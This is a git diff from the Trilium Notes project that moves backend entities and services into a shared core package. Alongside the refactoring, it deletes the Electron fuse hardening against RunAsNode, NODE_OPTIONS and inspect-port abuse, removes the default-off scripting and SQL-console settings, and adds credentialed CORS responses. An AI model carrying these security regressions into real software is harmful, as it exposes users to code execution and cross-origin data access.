@@ -21,20 +20,25 @@ const debouncedHandleContentUpdate = debounce(handleContentUpdate, 1000);
  * @returns the list of templates.
  */
 export default async function getTemplates() {
-    // Build the definitions and populate the cache.
-    const snippets = await search.searchForNotes("#textSnippet");
-    const definitions: TemplateDefinition[] = [];
-    for (const snippet of snippets) {
-        const { description } = await invalidateCacheFor(snippet);
+    try {
+        // Build the definitions and populate the cache.
+        const snippets = await search.searchForNotes("#textSnippet");
+        const definitions: TemplateDefinition[] = [];
+        for (const snippet of snippets) {
+            const { description } = await invalidateCacheFor(snippet);
 
-        definitions.push({
-            title: snippet.title,
-            data: () => templateCache.get(snippet.noteId)?.content ?? "",
-            icon: buildIcon(snippet),
-            description
-        });
+            definitions.push({
+                title: snippet.title,
+                data: () => templateCache.get(snippet.noteId)?.content ?? "",
+                icon: buildIcon(snippet),
+                description
+            });
+        }
+        return definitions;
+    } catch (e) {
+        logError("Error while building text snippet templates: ", e);
+        return [];
     }
-    return definitions;
 }
 
 async function invalidateCacheFor(snippet: FNote) {

apps/desktop/electron-forge/forge.config.ts

@@ -1,6 +1,4 @@
-import { FusesPlugin } from "@electron-forge/plugin-fuses";
 import type { ForgeConfig } from "@electron-forge/shared-types";
-import { FuseV1Options, FuseVersion } from "@electron/fuses";
 import { LOCALES } from "@triliumnext/commons";
 import { existsSync } from "fs";
 import fs from "fs-extra";
@@ -168,24 +166,7 @@ const config: ForgeConfig = {
         {
             name: "@electron-forge/plugin-auto-unpack-natives",
             config: {}
-        },
-        new FusesPlugin({
-            version: FuseVersion.V1,
-            // Security: Disable RunAsNode to prevent local attackers from launching
-            // the Electron app in Node.js mode via ELECTRON_RUN_AS_NODE env variable.
-            // This prevents TCC bypass / prompt spoofing attacks on macOS and
-            // "living off the land" privilege escalation on all platforms.
-            [FuseV1Options.RunAsNode]: false,
-            // Security: Disable NODE_OPTIONS and NODE_EXTRA_CA_CERTS environment
-            // variables to prevent injection of arbitrary Node.js runtime options.
-            [FuseV1Options.EnableNodeOptionsEnvironmentVariable]: false,
-            // Security: Disable --inspect and --inspect-brk CLI arguments to prevent
-            // debugger protocol exposure that could enable remote code execution.
-            [FuseV1Options.EnableNodeCliInspectArguments]: false,
-            // Security: Only allow loading the app from the ASAR archive to prevent
-            // loading of unverified code from alternative file paths.
-            [FuseV1Options.OnlyLoadAppFromAsar]: true,
-        }),
+        }
     ],
     hooks: {
         // Remove unused locales from the packaged app to save some space.

apps/desktop/package.json

@@ -27,12 +27,13 @@
     "electron-debug": "4.1.0",
     "electron-dl": "4.0.0",
     "electron-squirrel-startup": "1.0.1",
-    "jquery-hotkeys": "0.2.2",
-    "jquery.fancytree": "2.38.5"
+    "jquery.fancytree": "2.38.5",
+    "jquery-hotkeys": "0.2.2"
   },
   "devDependencies": {
     "@types/electron-squirrel-startup": "1.0.2",
     "@triliumnext/commons": "workspace:*",
+    "@triliumnext/core": "workspace:*",
     "@triliumnext/server": "workspace:*",
     "copy-webpack-plugin": "14.0.0",
     "electron": "41.0.3",
@@ -44,13 +45,6 @@
     "@electron-forge/maker-squirrel": "7.11.1",
     "@electron-forge/maker-zip": "7.11.1",
     "@electron-forge/plugin-auto-unpack-natives": "7.11.1",
-    "@electron-forge/plugin-fuses": "7.11.1",
-    "@electron/fuses": "1.8.0",
-    "@triliumnext/commons": "workspace:*",
-    "@triliumnext/server": "workspace:*",
-    "@types/electron-squirrel-startup": "1.0.2",
-    "copy-webpack-plugin": "13.0.1",
-    "electron": "40.4.1",
     "prebuild-install": "7.1.3"
   }
 }

apps/desktop/src/main.ts

@@ -1,17 +1,24 @@
-import { initializeTranslations } from "@triliumnext/server/src/services/i18n.js";
-import { t } from "i18next";
-
-import { app, globalShortcut, BrowserWindow } from "electron";
-import sqlInit from "@triliumnext/server/src/services/sql_init.js";
-import windowService from "@triliumnext/server/src/services/window.js";
-import tray from "@triliumnext/server/src/services/tray.js";
+import { initializeCore } from "@triliumnext/core";
+import ClsHookedExecutionContext from "@triliumnext/server/src/cls_provider.js";
+import NodejsCryptoProvider from "@triliumnext/server/src/crypto_provider.js";
+import dataDirs from "@triliumnext/server/src/services/data_dir.js";
 import options from "@triliumnext/server/src/services/options.js";
+import port from "@triliumnext/server/src/services/port.js";
+import NodeRequestProvider from "@triliumnext/server/src/services/request.js";
+import sqlInit from "@triliumnext/server/src/services/sql_init.js";
+import tray from "@triliumnext/server/src/services/tray.js";
+import windowService from "@triliumnext/server/src/services/window.js";
+import WebSocketMessagingProvider from "@triliumnext/server/src/services/ws_messaging_provider.js";
+import BetterSqlite3Provider from "@triliumnext/server/src/sql_provider.js";
+import { app, BrowserWindow,globalShortcut } from "electron";
 import electronDebug from "electron-debug";
 import electronDl from "electron-dl";
-import { PRODUCT_NAME } from "./app-info";
-import port from "@triliumnext/server/src/services/port.js";
-import { join } from "path";
+import fs from "fs";
+import { t } from "i18next";
+import path, { join } from "path";
+
 import { deferred, LOCALES } from "../../../packages/commons/src";
+import { PRODUCT_NAME } from "./app-info";
 
 async function main() {
     const userDataPath = getUserData();
@@ -82,7 +89,7 @@ async function main() {
         }
     });
 
-    await initializeTranslations();
+    // await initializeTranslations();
 
     const isPrimaryInstance = (await import("electron")).app.requestSingleInstanceLock();
     if (!isPrimaryInstance) {
@@ -93,6 +100,50 @@ async function main() {
     // this is to disable electron warning spam in the dev console (local development only)
     process.env["ELECTRON_DISABLE_SECURITY_WARNINGS"] = "true";
 
+    const { DOCUMENT_PATH } = (await import("@triliumnext/server/src/services/data_dir.js")).default;
+    const config = (await import("@triliumnext/server/src/services/config.js")).default;
+
+    const dbProvider = new BetterSqlite3Provider();
+    dbProvider.loadFromFile(DOCUMENT_PATH, config.General.readOnly);
+
+    await initializeCore({
+        dbConfig: {
+            provider: dbProvider,
+            isReadOnly: config.General.readOnly,
+            async onTransactionCommit() {
+                const ws = (await import("@triliumnext/server/src/services/ws.js")).default;
+                ws.sendTransactionEntityChangesToAllClients();
+            },
+            async onTransactionRollback() {
+                const cls = (await import("@triliumnext/server/src/services/cls.js")).default;
+                const becca_loader = (await import("@triliumnext/core")).becca_loader;
+                const entity_changes = (await import("@triliumnext/server/src/services/entity_changes.js")).default;
+                const log = (await import("@triliumnext/server/src/services/log")).default;
+
+                const entityChangeIds = cls.getAndClearEntityChangeIds();
+
+                if (entityChangeIds.length > 0) {
+                    log.info("Transaction rollback dirtied the becca, forcing reload.");
+
+                    becca_loader.load();
+                }
+
+                // the maxEntityChangeId has been incremented during failed transaction, need to recalculate
+                entity_changes.recalculateMaxEntityChangeId();
+            },
+        },
+        crypto: new NodejsCryptoProvider(),
+        request: new NodeRequestProvider(),
+        executionContext: new ClsHookedExecutionContext(),
+        messaging: new WebSocketMessagingProvider(),
+        schema: fs.readFileSync(require.resolve("@triliumnext/core/src/assets/schema.sql"), "utf-8"),
+        translations: (await import("@triliumnext/server/src/services/i18n.js")).initializeTranslations,
+        extraAppInfo: {
+            nodeVersion: process.version,
+            dataDirectory: path.resolve(dataDirs.TRILIUM_DATA_DIR)
+        }
+    });
+
     const startTriliumServer = (await import("@triliumnext/server/src/www.js")).default;
     await startTriliumServer();
     console.log("Server loaded");
@@ -141,7 +192,7 @@ function getElectronLocale() {
     // For RTL, we have to force the UI locale to align the window buttons properly.
     if (formattingLocale && !correspondingLocale?.rtl) return formattingLocale;
 
-    return uiLocale || "en"
+    return uiLocale || "en";
 }
 
 main();

apps/server/package.json

@@ -39,6 +39,7 @@
     "@braintree/sanitize-url": "7.1.2",
     "@electron/remote": "2.1.3",
     "@triliumnext/commons": "workspace:*",
+    "@triliumnext/core": "workspace:*",
     "@triliumnext/express-partial-content": "workspace:*",
     "@triliumnext/highlightjs": "workspace:*",
     "@triliumnext/turndown-plugin-gfm": "workspace:*",
@@ -49,17 +50,13 @@
     "@types/cookie-parser": "1.4.10",
     "@types/debounce": "1.2.4",
     "@types/ejs": "3.1.5",
-    "@types/escape-html": "1.0.4",
     "@types/express-http-proxy": "1.6.7",
     "@types/express-session": "1.18.2",
     "@types/fs-extra": "11.0.4",
     "@types/html": "1.0.4",
     "@types/ini": "4.1.1",
-    "@types/mime-types": "3.0.1",
     "@types/multer": "2.1.0",
     "@types/safe-compare": "1.1.2",
-    "@types/sanitize-html": "2.16.1",
-    "@types/sax": "1.2.7",
     "@types/serve-favicon": "2.5.7",
     "@types/serve-static": "2.2.0",
     "@types/stream-throttle": "0.1.4",
@@ -69,7 +66,6 @@
     "@types/ws": "8.18.1",
     "@types/xml2js": "0.4.14",
     "archiver": "7.0.1",
-    "async-mutex": "0.5.0",
     "axios": "1.13.6",
     "bindings": "1.5.0",
     "bootstrap": "5.3.8",
@@ -86,7 +82,6 @@
     "electron": "41.0.3",
     "electron-debug": "4.1.0",
     "electron-window-state": "5.0.3",
-    "escape-html": "1.0.3",
     "express": "5.2.1",
     "express-http-proxy": "2.1.2",
     "express-openid-connect": "2.19.4",
@@ -108,13 +103,10 @@
     "jimp": "1.6.0",
     "lorem-ipsum": "2.0.8",
     "marked": "17.0.5",
-    "mime-types": "3.0.2",
     "multer": "2.1.1",
     "normalize-strings": "1.1.1",
     "rand-token": "1.0.1",
     "safe-compare": "1.1.4",
-    "sanitize-filename": "1.6.4",
-    "sanitize-html": "2.17.2",
     "sax": "1.6.0",
     "serve-favicon": "2.5.1",
     "stream-throttle": "0.1.3",
@@ -125,7 +117,6 @@
     "time2fa": "1.4.2",
     "tmp": "0.2.5",
     "turnish": "1.8.0",
-    "unescape": "1.0.1",
     "vite": "8.0.1",
     "ws": "8.20.0",
     "xml2js": "0.6.2",

apps/server/src/anonymize.ts

@@ -1,6 +1,6 @@
 import anonymizationService from "./services/anonymization.js";
 import sqlInit from "./services/sql_init.js";
-await import("./becca/entity_constructor.js");
+await import("@triliumnext/core");
 
 sqlInit.dbReady.then(async () => {
     try {

apps/server/src/app.ts

@@ -1,6 +1,6 @@
-import "./services/handlers.js";
-import "./becca/becca_loader.js";
+import("@triliumnext/core");
 
+import { erase } from "@triliumnext/core";
 import compression from "compression";
 import cookieParser from "cookie-parser";
 import ejs from "ejs";
@@ -16,7 +16,6 @@ import custom from "./routes/custom.js";
 import error_handlers from "./routes/error_handlers.js";
 import routes from "./routes/routes.js";
 import config from "./services/config.js";
-import { startScheduledCleanup } from "./services/erase.js";
 import log from "./services/log.js";
 import openID from "./services/open_id.js";
 import { RESOURCE_DIR } from "./services/resource_dir.js";
@@ -39,9 +38,10 @@ export default async function buildApp() {
     app.set("view engine", "ejs");
 
     app.use((req, res, next) => {
-        // set CORS header
+        // set CORS headers
         if (config["Network"]["corsAllowOrigin"]) {
             res.header("Access-Control-Allow-Origin", config["Network"]["corsAllowOrigin"]);
+            res.header("Access-Control-Allow-Credentials", "true");
         }
         if (config["Network"]["corsAllowMethods"]) {
             res.header("Access-Control-Allow-Methods", config["Network"]["corsAllowMethods"]);
@@ -50,6 +50,12 @@ export default async function buildApp() {
             res.header("Access-Control-Allow-Headers", config["Network"]["corsAllowHeaders"]);
         }
 
+        // Handle preflight OPTIONS requests
+        if (req.method === "OPTIONS" && config["Network"]["corsAllowOrigin"]) {
+            res.sendStatus(204);
+            return;
+        }
+
         res.locals.t = t;
         return next();
     });
@@ -99,18 +105,17 @@ export default async function buildApp() {
     custom.register(app);
     error_handlers.register(app);
 
-    const { startSyncTimer } = await import("./services/sync.js");
-    startSyncTimer();
+    const { sync, consistency_checks } = await import("@triliumnext/core");
+    sync.startSyncTimer();
 
     await import("./services/backup.js");
 
-    const { startConsistencyChecks } = await import("./services/consistency_checks.js");
-    startConsistencyChecks();
+    consistency_checks.startConsistencyChecks();
 
     const { startScheduler } = await import("./services/scheduler.js");
     startScheduler();
 
-    startScheduledCleanup();
+    erase.startScheduledCleanup();
 
     if (utils.isElectron) {
         (await import("@electron/remote/main/index.js")).initialize();

apps/server/src/assets/config-sample.ini

@@ -67,13 +67,3 @@ oauthIssuerName=
 # Set the issuer icon for OAuth/OpenID authentication
 # This is the icon of the service that will be used to verify the user's identity
 oauthIssuerIcon=
-
-[Scripting]
-# Enable backend/frontend script execution. WARNING: Scripts have full server access including
-# filesystem, network, and OS commands via require('child_process'). Only enable if you trust
-# all users with admin-level access to the server.
-# Desktop builds override this to true automatically.
-enabled=false
-
-# Enable the SQL console (allows raw SQL execution against the database)
-sqlConsoleEnabled=false

apps/server/src/assets/translations/en/server.json

@@ -233,12 +233,6 @@
   "setup_sync-from-desktop": {
     "heading": "Sync from Desktop",
     "description": "This setup needs to be initiated from the desktop instance:",
-    "step1": "Open your desktop instance of Trilium Notes.",
-    "step2": "From the Trilium Menu, click Options.",
-    "step3": "Click on Sync category.",
-    "step4": "Change server instance address to: {{- host}} and click Save.",
-    "step5": "Click \"Test sync\" button to verify connection is successful.",
-    "step6": "Once you've completed these steps, click {{- link}}.",
     "step6-here": "here"
   },
   "setup_sync-from-server": {

apps/server/src/assets/views/print.ejs

@@ -1,32 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="utf-8">
-    <link rel="shortcut icon" href="favicon.ico">
-    <meta name="mobile-web-app-capable" content="yes">
-    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
-    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, viewport-fit=cover" />
-    <link rel="manifest" crossorigin="use-credentials" href="../manifest.webmanifest">
-    <title>Trilium Notes</title>
-    <script src="../<%= appPath %>/runtime.js" crossorigin type="module"></script>
-</head>
-<body
-  id="trilium-print"
-  lang="<%= currentLocale.id %>" dir="<%= currentLocale.rtl ? 'rtl' : 'ltr' %>"
->
-<noscript><%= t("javascript-required") %></noscript>
-
-<script>
-    // hide body to reduce flickering on the startup. This is done through JS and not CSS to not hide <noscript>
-    document.getElementsByTagName("body")[0].style.display = "none";
-</script>
-
-<%- include("./partials/windowGlobal.ejs", locals) %>
-
-<!-- Required for correct loading of scripts in Electron -->
-<script>if (typeof module === 'object') {window.module = module; module = undefined;}</script>
-
-<script src="../<%= appPath %>/print.js" crossorigin type="module"></script>
-
-</body>
-</html>

apps/server/src/assets/views/setup.ejs

@@ -10,42 +10,7 @@
         body {
             /* Prevent the content from being rendered before the main stylesheet loads */
             display: none;
-        }
-        .lds-ring {
-            display: inline-block;
-            position: relative;
-            width: 60px;
-            height: 60px;
-        }
-        .lds-ring div {
-            box-sizing: border-box;
-            display: block;
-            position: absolute;
-            width: 48px;
-            height: 48px;
-            margin: 8px;
-            border: 6px solid black;
-            border-radius: 50%;
-            animation: lds-ring 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
-            border-color: black transparent transparent transparent;
-        }
-        .lds-ring div:nth-child(1) {
-            animation-delay: -0.45s;
-        }
-        .lds-ring div:nth-child(2) {
-            animation-delay: -0.3s;
-        }
-        .lds-ring div:nth-child(3) {
-            animation-delay: -0.15s;
-        }
-        @keyframes lds-ring {
-            0% {
-                transform: rotate(0deg);
-            }
-            100% {
-                transform: rotate(360deg);
-            }
-        }
+        }        
     </style>
     <script src="<%= appPath %>/runtime.js" crossorigin type="module"></script>
 </head>
@@ -90,13 +55,6 @@
             <h2><%= t("setup.init-in-progress") %></h2>
 
             <div style="display: flex; justify-content: flex-start; margin-top: 20px;">
-                <div class="lds-ring" style="margin-right: 20px;">
-                    <div></div>
-                    <div></div>
-                    <div></div>
-                    <div></div>
-                </div>
-
                 <div style="line-height: 60px;">
                     <p><%= t("setup.redirecting") %></p>
                 </div>

apps/server/src/becca/becca.ts

@@ -1,7 +1,2 @@
-"use strict";
-
-import Becca from "./becca-interface.js";
-
-const becca = new Becca();
-
+import { becca } from "@triliumnext/core";
 export default becca;

apps/server/src/becca/entities/battachment.ts

@@ -1,260 +1,2 @@
-
-
-import type { AttachmentRow } from "@triliumnext/commons";
-
-import dateUtils from "../../services/date_utils.js";
-import log from "../../services/log.js";
-import noteService from "../../services/notes.js";
-import protectedSessionService from "../../services/protected_session.js";
-import sql from "../../services/sql.js";
-import utils from "../../services/utils.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-import type BBranch from "./bbranch.js";
-import type BNote from "./bnote.js";
-
-const attachmentRoleToNoteTypeMapping = {
-    image: "image",
-    file: "file"
-};
-
-interface ContentOpts {
-    // TODO: Found in bnote.ts, to check if it's actually used and not a typo.
-    forceSave?: boolean;
-
-    /** will also save this BAttachment entity */
-    forceFullSave?: boolean;
-    /** override frontend heuristics on when to reload, instruct to reload */
-    forceFrontendReload?: boolean;
-}
-
-/**
- * Attachment represent data related/attached to the note. Conceptually similar to attributes, but intended for
- * larger amounts of data and generally not accessible to the user.
- */
-class BAttachment extends AbstractBeccaEntity<BAttachment> {
-    static get entityName() {
-        return "attachments";
-    }
-    static get primaryKeyName() {
-        return "attachmentId";
-    }
-    static get hashedProperties() {
-        return ["attachmentId", "ownerId", "role", "mime", "title", "blobId", "utcDateScheduledForErasureSince"];
-    }
-
-    noteId?: number;
-    attachmentId?: string;
-    /** either noteId or revisionId to which this attachment belongs */
-    ownerId!: string;
-    role!: string;
-    mime!: string;
-    title!: string;
-    type?: keyof typeof attachmentRoleToNoteTypeMapping;
-    position?: number;
-    utcDateScheduledForErasureSince?: string | null;
-    /** optionally added to the entity */
-    contentLength?: number;
-    isDecrypted?: boolean;
-
-    constructor(row: AttachmentRow) {
-        super();
-
-        this.updateFromRow(row);
-        this.decrypt();
-    }
-
-    updateFromRow(row: AttachmentRow): void {
-        if (!row.ownerId?.trim()) {
-            throw new Error("'ownerId' must be given to initialize a Attachment entity");
-        } else if (!row.role?.trim()) {
-            throw new Error("'role' must be given to initialize a Attachment entity");
-        } else if (!row.mime?.trim()) {
-            throw new Error("'mime' must be given to initialize a Attachment entity");
-        } else if (!row.title?.trim()) {
-            throw new Error("'title' must be given to initialize a Attachment entity");
-        }
-
-        this.attachmentId = row.attachmentId;
-        this.ownerId = row.ownerId;
-        this.role = row.role;
-        this.mime = row.mime;
-        this.title = row.title;
-        this.position = row.position;
-        this.blobId = row.blobId;
-        this.isProtected = !!row.isProtected;
-        this.dateModified = row.dateModified;
-        this.utcDateModified = row.utcDateModified;
-        this.utcDateScheduledForErasureSince = row.utcDateScheduledForErasureSince;
-        this.contentLength = row.contentLength;
-    }
-
-    copy(): BAttachment {
-        return new BAttachment({
-            ownerId: this.ownerId,
-            role: this.role,
-            mime: this.mime,
-            title: this.title,
-            blobId: this.blobId,
-            isProtected: this.isProtected
-        });
-    }
-
-    getNote(): BNote {
-        return this.becca.notes[this.ownerId];
-    }
-
-    /** @returns true if the note has string content (not binary) */
-    override hasStringContent(): boolean {
-        return utils.isStringNote(this.type, this.mime); // here was !== undefined && utils.isStringNote(this.type, this.mime); I dont know why we need !=undefined. But it filters out canvas libary items
-    }
-
-    isContentAvailable() {
-        return (
-            !this.attachmentId || // new attachment which was not encrypted yet
-            !this.isProtected ||
-            protectedSessionService.isProtectedSessionAvailable()
-        );
-    }
-
-    getTitleOrProtected() {
-        return this.isContentAvailable() ? this.title : "[protected]";
-    }
-
-    decrypt() {
-        if (!this.isProtected || !this.attachmentId) {
-            this.isDecrypted = true;
-            return;
-        }
-
-        if (!this.isDecrypted && protectedSessionService.isProtectedSessionAvailable()) {
-            try {
-                this.title = protectedSessionService.decryptString(this.title) || "";
-                this.isDecrypted = true;
-            } catch (e: any) {
-                log.error(`Could not decrypt attachment ${this.attachmentId}: ${e.message} ${e.stack}`);
-            }
-        }
-    }
-
-    getContent(): Buffer {
-        return this._getContent() as Buffer;
-    }
-
-    setContent(content: string | Buffer, opts?: ContentOpts) {
-        this._setContent(content, opts);
-    }
-
-    convertToNote(): { note: BNote; branch: BBranch } {
-        // TODO: can this ever be "search"?
-        if ((this.type as string) === "search") {
-            throw new Error(`Note of type search cannot have child notes`);
-        }
-
-        if (!this.getNote()) {
-            throw new Error("Cannot find note of this attachment. It is possible that this is note revision's attachment. " + "Converting note revision's attachments to note is not (yet) supported.");
-        }
-
-        if (!(this.role in attachmentRoleToNoteTypeMapping)) {
-            throw new Error(`Mapping from attachment role '${this.role}' to note's type is not defined`);
-        }
-
-        if (!this.isContentAvailable()) {
-            // isProtected is the same for attachment
-            throw new Error(`Cannot convert protected attachment outside of protected session`);
-        }
-
-        const { note, branch } = noteService.createNewNote({
-            parentNoteId: this.ownerId,
-            title: this.title,
-            type: (attachmentRoleToNoteTypeMapping as any)[this.role],
-            mime: this.mime,
-            content: this.getContent(),
-            isProtected: this.isProtected
-        });
-
-        this.markAsDeleted();
-
-        const parentNote = this.getNote();
-
-        if (this.role === "image" && parentNote.type === "text") {
-            const origContent = parentNote.getContent();
-
-            if (typeof origContent !== "string") {
-                throw new Error(`Note with ID '${note.noteId} has a text type but non-string content.`);
-            }
-
-            const oldAttachmentUrl = `api/attachments/${this.attachmentId}/image/`;
-            const newNoteUrl = `api/images/${note.noteId}/`;
-
-            const fixedContent = utils.replaceAll(origContent, oldAttachmentUrl, newNoteUrl);
-
-            if (fixedContent !== origContent) {
-                parentNote.setContent(fixedContent);
-            }
-
-            noteService.asyncPostProcessContent(note, fixedContent);
-        }
-
-        return { note, branch };
-    }
-
-    getFileName() {
-        const type = this.role === "image" ? "image" : "file";
-
-        return utils.formatDownloadTitle(this.title, type, this.mime);
-    }
-
-    override beforeSaving() {
-        super.beforeSaving();
-
-        if (this.position === undefined || this.position === null) {
-            this.position =
-                10 +
-                sql.getValue<number>(
-                    /*sql*/`SELECT COALESCE(MAX(position), 0)
-                                                        FROM attachments
-                                                        WHERE ownerId = ?`,
-                    [this.noteId]
-                );
-        }
-
-        this.dateModified = dateUtils.localNowDateTime();
-        this.utcDateModified = dateUtils.utcNowDateTime();
-    }
-
-    getPojo() {
-        return {
-            attachmentId: this.attachmentId,
-            ownerId: this.ownerId,
-            role: this.role,
-            mime: this.mime,
-            title: this.title || undefined,
-            position: this.position,
-            blobId: this.blobId,
-            isProtected: !!this.isProtected,
-            isDeleted: false,
-            dateModified: this.dateModified,
-            utcDateModified: this.utcDateModified,
-            utcDateScheduledForErasureSince: this.utcDateScheduledForErasureSince,
-            contentLength: this.contentLength
-        };
-    }
-
-    override getPojoToSave() {
-        const pojo = this.getPojo();
-        delete pojo.contentLength;
-
-        if (pojo.isProtected) {
-            if (this.isDecrypted) {
-                pojo.title = protectedSessionService.encrypt(pojo.title || "") || undefined;
-            } else {
-                // updating protected note outside of protected session means we will keep original ciphertexts
-                delete pojo.title;
-            }
-        }
-
-        return pojo;
-    }
-}
-
+import { BAttachment } from "@triliumnext/core";
 export default BAttachment;

apps/server/src/becca/entities/battribute.ts

@@ -1,227 +1,2 @@
-"use strict";
-
-import BNote from "./bnote.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-import dateUtils from "../../services/date_utils.js";
-import promotedAttributeDefinitionParser from "../../services/promoted_attribute_definition_parser.js";
-import sanitizeAttributeName from "../../services/sanitize_attribute_name.js";
-import type { AttributeRow, AttributeType } from "@triliumnext/commons";
-
-interface SavingOpts {
-    skipValidation?: boolean;
-}
-
-/**
- * Attribute is an abstract concept which has two real uses - label (key - value pair)
- * and relation (representing named relationship between source and target note)
- */
-class BAttribute extends AbstractBeccaEntity<BAttribute> {
-    static get entityName() {
-        return "attributes";
-    }
-    static get primaryKeyName() {
-        return "attributeId";
-    }
-    static get hashedProperties() {
-        return ["attributeId", "noteId", "type", "name", "value", "isInheritable"];
-    }
-
-    attributeId!: string;
-    noteId!: string;
-    type!: AttributeType;
-    name!: string;
-    position!: number;
-    value!: string;
-    isInheritable!: boolean;
-
-    constructor(row?: AttributeRow) {
-        super();
-
-        if (!row) {
-            return;
-        }
-
-        this.updateFromRow(row);
-        this.init();
-    }
-
-    updateFromRow(row: AttributeRow) {
-        this.update([row.attributeId, row.noteId, row.type, row.name, row.value, row.isInheritable, row.position, row.utcDateModified]);
-    }
-
-    update([attributeId, noteId, type, name, value, isInheritable, position, utcDateModified]: any) {
-        this.attributeId = attributeId;
-        this.noteId = noteId;
-        this.type = type;
-        this.name = name;
-        this.position = position;
-        this.value = value || "";
-        this.isInheritable = !!isInheritable;
-        this.utcDateModified = utcDateModified;
-
-        return this;
-    }
-
-    override init() {
-        if (this.attributeId) {
-            this.becca.attributes[this.attributeId] = this;
-        }
-
-        if (!(this.noteId in this.becca.notes)) {
-            // entities can come out of order in sync, create skeleton which will be filled later
-            this.becca.addNote(this.noteId, new BNote({ noteId: this.noteId }));
-        }
-
-        this.becca.notes[this.noteId].ownedAttributes.push(this);
-
-        const key = `${this.type}-${this.name.toLowerCase()}`;
-        this.becca.attributeIndex[key] = this.becca.attributeIndex[key] || [];
-        this.becca.attributeIndex[key].push(this);
-
-        const targetNote = this.targetNote;
-
-        if (targetNote) {
-            targetNote.targetRelations.push(this);
-        }
-    }
-
-    validate() {
-        if (!["label", "relation"].includes(this.type)) {
-            throw new Error(`Invalid attribute type '${this.type}' in attribute '${this.attributeId}' of note '${this.noteId}'`);
-        }
-
-        if (!this.name?.trim()) {
-            throw new Error(`Invalid empty name in attribute '${this.attributeId}' of note '${this.noteId}'`);
-        }
-
-        if (this.type === "relation" && !(this.value in this.becca.notes)) {
-            throw new Error(`Cannot save relation '${this.name}' of note '${this.noteId}' since it targets not existing note '${this.value}'.`);
-        }
-    }
-
-    get isAffectingSubtree() {
-        return this.isInheritable || (this.type === "relation" && ["template", "inherit"].includes(this.name));
-    }
-
-    get targetNoteId() {
-        // alias
-        return this.type === "relation" ? this.value : undefined;
-    }
-
-    isAutoLink() {
-        return this.type === "relation" && ["internalLink", "imageLink", "relationMapLink", "includeNoteLink"].includes(this.name);
-    }
-
-    get note() {
-        return this.becca.notes[this.noteId];
-    }
-
-    get targetNote() {
-        if (this.type === "relation") {
-            return this.becca.notes[this.value];
-        }
-    }
-
-    getNote() {
-        const note = this.becca.getNote(this.noteId);
-
-        if (!note) {
-            throw new Error(`Note '${this.noteId}' of attribute '${this.attributeId}', type '${this.type}', name '${this.name}' does not exist.`);
-        }
-
-        return note;
-    }
-
-    getTargetNote() {
-        if (this.type !== "relation") {
-            throw new Error(`Attribute '${this.attributeId}' is not a relation.`);
-        }
-
-        if (!this.value) {
-            return null;
-        }
-
-        return this.becca.getNote(this.value);
-    }
-
-    isDefinition() {
-        return this.type === "label" && (this.name.startsWith("label:") || this.name.startsWith("relation:"));
-    }
-
-    getDefinition() {
-        return promotedAttributeDefinitionParser.parse(this.value);
-    }
-
-    getDefinedName() {
-        if (this.type === "label" && this.name.startsWith("label:")) {
-            return this.name.substr(6);
-        } else if (this.type === "label" && this.name.startsWith("relation:")) {
-            return this.name.substr(9);
-        } else {
-            return this.name;
-        }
-    }
-
-    override get isDeleted() {
-        return !(this.attributeId in this.becca.attributes);
-    }
-
-    override beforeSaving(opts: SavingOpts = {}) {
-        if (!opts.skipValidation) {
-            this.validate();
-        }
-
-        this.name = sanitizeAttributeName(this.name);
-
-        if (!this.value) {
-            // null value isn't allowed
-            this.value = "";
-        }
-
-        if (this.position === undefined || this.position === null) {
-            const maxExistingPosition = this.getNote()
-                .getAttributes()
-                .reduce((maxPosition, attr) => Math.max(maxPosition, attr.position || 0), 0);
-
-            this.position = maxExistingPosition + 10;
-        }
-
-        if (!this.isInheritable) {
-            this.isInheritable = false;
-        }
-
-        this.utcDateModified = dateUtils.utcNowDateTime();
-
-        super.beforeSaving();
-
-        this.becca.attributes[this.attributeId] = this;
-    }
-
-    getPojo() {
-        return {
-            attributeId: this.attributeId,
-            noteId: this.noteId,
-            type: this.type,
-            name: this.name,
-            position: this.position,
-            value: this.value,
-            isInheritable: this.isInheritable,
-            utcDateModified: this.utcDateModified,
-            isDeleted: false
-        };
-    }
-
-    createClone(type: AttributeType, name: string, value: string, isInheritable?: boolean) {
-        return new BAttribute({
-            noteId: this.noteId,
-            type: type,
-            name: name,
-            value: value,
-            position: this.position,
-            isInheritable: isInheritable,
-            utcDateModified: this.utcDateModified
-        });
-    }
-}
-
+import { BAttribute } from "@triliumnext/core";
 export default BAttribute;

apps/server/src/becca/entities/bbranch.ts

@@ -1,288 +1,2 @@
-"use strict";
-
-import BNote from "./bnote.js";
-import AbstractBeccaEntity from "./abstract_becca_entity.js";
-import dateUtils from "../../services/date_utils.js";
-import utils from "../../services/utils.js";
-import TaskContext from "../../services/task_context.js";
-import cls from "../../services/cls.js";
-import log from "../../services/log.js";
-import type { BranchRow } from "@triliumnext/commons";
-import handlers from "../../services/handlers.js";
-
-/**
- * Branch represents a relationship between a child note and its parent note. Trilium allows a note to have multiple
- * parents.
- *
- * Note that you should not rely on the branch's identity, since it can change easily with a note's move.
- * Always check noteId instead.
- */
-class BBranch extends AbstractBeccaEntity<BBranch> {
-    static get entityName() {
-        return "branches";
-    }
-    static get primaryKeyName() {
-        return "branchId";
-    }
-    // notePosition is not part of hash because it would produce a lot of updates in case of reordering
-    static get hashedProperties() {
-        return ["branchId", "noteId", "parentNoteId", "prefix"];
-    }
-
-    branchId?: string;
-    noteId!: string;
-    parentNoteId!: string;
-    prefix!: string | null;
-    notePosition!: number;
-    isExpanded!: boolean;
-
-    constructor(row?: BranchRow) {
-        super();
-
-        if (!row) {
-            return;
-        }
-
-        this.updateFromRow(row);
-        this.init();
-    }
-
-    updateFromRow(row: BranchRow) {
-        this.update([row.branchId, row.noteId, row.parentNoteId, row.prefix, row.notePosition, row.isExpanded, row.utcDateModified]);
-    }
-
-    update([branchId, noteId, parentNoteId, prefix, notePosition, isExpanded, utcDateModified]: any) {
-        this.branchId = branchId;
-        this.noteId = noteId;
-        this.parentNoteId = parentNoteId;
-        this.prefix = prefix;
-        this.notePosition = notePosition;
-        this.isExpanded = !!isExpanded;
-        this.utcDateModified = utcDateModified;
-
-        return this;
-    }
-
-    override init() {
-        if (this.branchId) {
-            this.becca.branches[this.branchId] = this;
